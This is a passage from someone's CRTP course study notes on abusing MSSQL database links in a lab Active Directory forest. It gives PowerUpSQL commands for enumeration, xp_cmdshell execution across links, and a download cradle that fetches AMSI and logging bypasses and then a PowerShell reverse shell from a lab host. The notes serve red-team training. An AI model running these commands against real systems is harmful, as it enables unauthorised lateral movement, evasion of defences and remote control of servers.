| 2850 | 2851 | 2852 | 2853 | 2854 | ```powershell 2855 | Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -Verbose 2856 | ``` 2857 | 2858 | 2859 | 2860 | ![](https://i.imgur.com/woeljrx.png) 2861 | 2862 | 2863 | **Sweet! We have `sysadmin` set to `1` which means `True` on `eu-sql33` server!** 2864 | 2865 | 2866 | - Let try to get command execution on `eu-sql33` 2867 | 2868 | 2869 | ```powershell 2870 | # -Instance : the first sql instance 2871 | # -Query : command to run 2872 | # -QueryTarget : our target which has all condition met 2873 | 2874 | 2875 | Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'whoami'" -QueryTarget eu-sql33 2876 | ``` 2877 | 2878 | 2879 | 2880 | **_Example Output_** 2881 | 2882 | 2883 | 2884 | ![](https://i.imgur.com/AK0H9dV.png) 2885 | 2886 | 2887 | 2888 | - Let’s try to execute a PowerShell download execute cradle to execute a PowerShell reverse shell on the `eu-sql33` instance. Remember to start a listener 2889 | - Make sure to start your **HFS** first and upload the file `sbloggingbypass.txt`, `amsibypass.txt` and `Invoke-PowerShellTcpEx.ps1` in other to host them 2890 | 2891 | 2892 | 2893 | ```powershell 2894 | Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec master..xp_cmdshell ''powershell -c "iex (iwr -UseBasicParsing http://172.16.100.5/sbloggingbypass.txt);iex (iwr -UseBasicParsing http://172.16.100.5/amsibypass.txt);iex (iwr -UseBasicParsing http://172.16.100.5/Invoke-PowerShellTcpEx.ps1)"''' -QueryTarget eu-sql33 2895 | ``` 2896 | 2897 | 2898 | 2899 | 2900 | **_Example Output_** 2901 | 2902 | 2903 | 2904 | 2905 | ![](https://i.imgur.com/JlCEJkl.png) 2906 | 2907 | 2908 | 2909 | 2910 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CRTP-Notes 2 | My notes containing the **Certified Red Team Professional** Course. This **Repository** will be updated frequently as i move on with the course. So help me **God** 📿 3 | 4 | ![image](https://github.com/sec-fortress/CRTP-Notes/assets/132317714/9f4a1a4b-9b20-472f-9fac-dbe6edf079bc) 5 | 6 | **Glory be to God for the completion of this certification, GG :)** 7 | -------------------------------------------------------------------------------- /Trust Abuse.md: -------------------------------------------------------------------------------- 1 | 2 | # **MSSQL Servers** 3 | 4 | 5 | 6 | - MS SQL servers are generally deployed in plenty in a Windows domain. 7 | - SQL Servers provide very good options for lateral movement as domain users can be mapped to database roles. 8 | - For MSSQL and PowerShell hackery, lets use PowerUpSQL 9 | https://github.com/NetSPI/PowerUpSQL 10 | 11 | 12 | 13 | **_Examples_** 14 | 15 | 16 | - Discovery (SPN Scanning) 17 | 18 | ```powershell 19 | Get-SQLInstanceDomain 20 | ``` 21 | 22 | - Check Accessibility 23 | 24 | ```powershell 25 | Get-SQLConnectionTestThreaded 26 | 27 | Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose 28 | ``` 29 | 30 | 31 | ![](https://i.imgur.com/GvA1sd2.png) 32 | 33 | 34 | - Gather Information 35 | 36 | ```powershell 37 | Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose 38 | ``` 39 | 40 | 41 | ![](https://i.imgur.com/9SWwFqr.png) 42 | 43 | 44 | 45 | > After running the above command and you see that the `ISSysadmin` option is set to **No**, as an attacker, you shouldn't loose interest because we can still extract information 46 | 47 | 48 | 49 | 50 | 51 | 52 | # **MSSQL Servers - Database Links** 53 | 54 | 55 | - A database link allows a SQL Server to access external data sources like other SQL Servers and OLE DB data sources. 56 | - In case of database links between SQL servers, that is, linked SQL servers it is possible to execute stored procedures. 57 | - Database links work even across forest trusts. 58 | 59 | 60 | 61 | ![](https://i.imgur.com/A5hBH7R.png) 62 | 63 | 64 | 65 | **_Examples_** 66 | 67 | 68 | - Searching Database Links 69 | - Look for links to remote servers 70 | 71 | ```powershell 72 | Get-SQLServerLink -Instance dcorp-mssql -Verbose 73 | ``` 74 | 75 | OR 76 | 77 | ```powershell 78 | select * from master..sysservers 79 | ``` 80 | 81 | 82 | 83 | ![](https://i.imgur.com/sK1jStA.png) 84 | 85 | 86 | > Data is accessible via the `DCORP-SQL1` link, this is what we want 87 | 88 | 89 | - Enumerating Database Links 90 | 91 | 92 | ```powershell 93 | Get-SQLServerLinkCrawl -Instance dcorp-mssql -Verbose 94 | ``` 95 | 96 | 97 | 98 | 99 | ![](https://i.imgur.com/xr7rwLQ.png) 100 | 101 | 102 | 103 | - Executing Commands 104 | - Use the `-QuertyTarget` parameter to run Query on a specific instance (without `-QueryTarget` the command tries to use `xp_cmdshell` on every link of the chain) 105 | 106 | 107 | ```powershell 108 | Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'whoami'" -QueryTarget eu-sql 109 | ``` 110 | 111 | 112 | 113 | ![](https://i.imgur.com/AhAmeLt.png) 114 | 115 | 116 | 117 | - Gain reverse shell instead of RCE 118 | 119 | 120 | 121 | 122 | 123 | ```powershell 124 | Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec master..xp_cmdshell ''powershell -c "iex (iwr -UseBasicParsing http://172.16.100.1/sbloggingbypass.txt);iex (iwr -UseBasicParsing http://172.16.100.1/amsibypass.txt);iex (iwr -UseBasicParsing http://172.1 6.100.1/Invoke-PowerShellTcpEx.ps1)"''' -QueryTarget eu-sql 125 | ``` 126 | 127 | 128 | 129 | 130 | > Make sure to start your **HTTP FIle Server (HFS)** first and upload the file `sbloggingbypass.txt`, `amsibypass.txt` and `Invoke-PowerShellTcpEx.ps1` in other to host them 131 | 132 | 133 | 134 | 135 | # **Learning Objective 22** 136 | 137 | 138 | - Get a reverse shell on a SQL server in eurocorp forest by abusing database links from dcorp-mssql. 139 | 140 | 141 | ## **Solution** 142 | 143 | **_Coming Soon_** 144 | 145 | 146 | # **References** 147 | 148 | 149 | - https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/abusing-ad-mssql 150 | - https://www.powershellgallery.com/ 151 | 152 | 153 | 154 | --------------------------------------------------------------------------------